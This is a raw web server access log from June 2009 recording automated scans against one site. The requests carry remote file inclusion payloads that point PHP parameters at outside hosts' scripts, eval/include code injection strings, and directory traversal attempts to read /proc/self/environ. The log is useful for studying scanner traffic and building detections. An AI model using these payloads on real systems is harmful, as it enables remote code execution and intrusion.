110.45.144.33 - - [29/Jun/2009:07:18:23 -0700] "GET /logs//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:19:28 -0700] "GET /logs/access.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:19:29 -0700] "GET /main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:19:29 -0700] "GET /logs//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:07:20:02 -0700] "GET /logs/access.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:07:20:02 -0700] "GET /main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:07:20:03 -0700] "GET /logs//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
65.55.107.181 - - [29/Jun/2009:07:20:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:21:56 -0700] "GET /logs/access.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:21:56 -0700] "GET /main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:21:56 -0700] "GET /logs//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:23:55 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:23:55 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:23:55 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:24:18 -0700] "GET /?INCLUDE_FOLDER=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:28:08 -0700] "GET /logs/access_090112.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
110.45.144.34 - - [29/Jun/2009:07:29:06 -0700] "GET /logs/access_090112.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:29:47 -0700] "GET /logs/access_090112.log//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:07:31:07 -0700] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:07:31:07 -0700] "GET /logs/access.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:07:31:07 -0700] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:34:04 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:34:04 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:34:05 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:34:05 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:34:05 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:34:05 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:06 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:06 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:06 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:07 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:07 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:07 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:07 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:07 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:07 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:08 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:08 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
203.235.1.115 - - [29/Jun/2009:07:34:08 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:34:14 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:34:14 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:35:09 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:35:18 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:35:19 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [29/Jun/2009:07:35:19 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:36:09 -0700] "GET /logs/access.log//?INCLUDE_FOLDER=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:36:09 -0700] "GET /?INCLUDE_FOLDER=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:36:10 -0700] "GET /logs//?INCLUDE_FOLDER=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 200 2230 "-" "libwww-perl/5.811" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:07:36:56 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:07:36:56 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:07:36:56 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:07:36:56 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:07:37:39 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:07:37:40 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:07:37:40 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:07:37:40 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "vspeaking.com"
72.82.228.83 - - [29/Jun/2009:07:44:08 -0700] "GET /logs//?path%5Bdocroot%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 200 2230 "-" "Mozilla/5.0" "vspeaking.com"
72.82.228.83 - - [29/Jun/2009:07:44:08 -0700] "GET /logs/access.log%20%20//?path%5Bdocroot%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
72.82.228.83 - - [29/Jun/2009:07:44:08 -0700] "GET /?path%5Bdocroot%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
72.82.228.83 - - [29/Jun/2009:07:45:41 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:07:45:41 -0700] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:07:45:41 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:47:28 -0700] "GET /logs/access_090112.log//?INCLUDE_FOLDER=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:47:28 -0700] "GET /?INCLUDE_FOLDER=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.vspeaking.com"
70.84.177.170 - - [29/Jun/2009:07:47:28 -0700] "GET /logs//?INCLUDE_FOLDER=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 200 2230 "-" "libwww-perl/5.811" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:50:05 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:50:05 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:50:05 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:50:21 -0700] "GET /logs//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [29/Jun/2009:07:50:21 -0700] "GET /main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:07:53:36 -0700] "GET /logs/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:07:53:36 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:07:53:36 -0700] "GET /phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:53:38 -0700] "GET /logs//main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:53:39 -0700] "GET /main.php?sayfa=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:07:55:33 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:07:57:30 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:59:28 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:59:28 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:07:59:28 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:08:03:26 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:08:03:26 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:08:03:26 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.15.230.250 - - [29/Jun/2009:08:04:36 -0700] "GET /logs/access_090413.log/include/lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.15.230.250 - - [29/Jun/2009:08:04:36 -0700] "GET /logs/include/lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.15.230.250 - - [29/Jun/2009:08:04:36 -0700] "GET /include/lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [29/Jun/2009:08:08:54 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [29/Jun/2009:08:08:54 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [29/Jun/2009:08:08:54 -0700] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:08:09:22 -0700] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:08:09:22 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:08:09:22 -0700] "GET /logs/access.log%20%20//templates/mangobery/footer.sample.php?Site_Path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.18.98.186 - - [29/Jun/2009:08:09:47 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.18.98.186 - - [29/Jun/2009:08:09:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.18.98.186 - - [29/Jun/2009:08:09:48 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:08:10:19 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:08:10:41 -0700] "GET /phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:08:11:52 -0700] "GET /logs/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:08:11:52 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:08:13:06 -0700] "GET /logs/access_090126.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:08:13:07 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:08:13:07 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
124.0.103.194 - - [29/Jun/2009:08:13:33 -0700] "GET /logs/access.log%20%20//templates/mangobery/footer.sample.php?Site_Path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:16:52 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:16:56 -0700] "GET /logs/access_090413.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:16:57 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:17:06 -0700] "GET /logs/access_090413.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:17:06 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:17:06 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.44.187.42 - - [29/Jun/2009:08:17:46 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.44.187.42 - - [29/Jun/2009:08:17:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:08:17:47 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
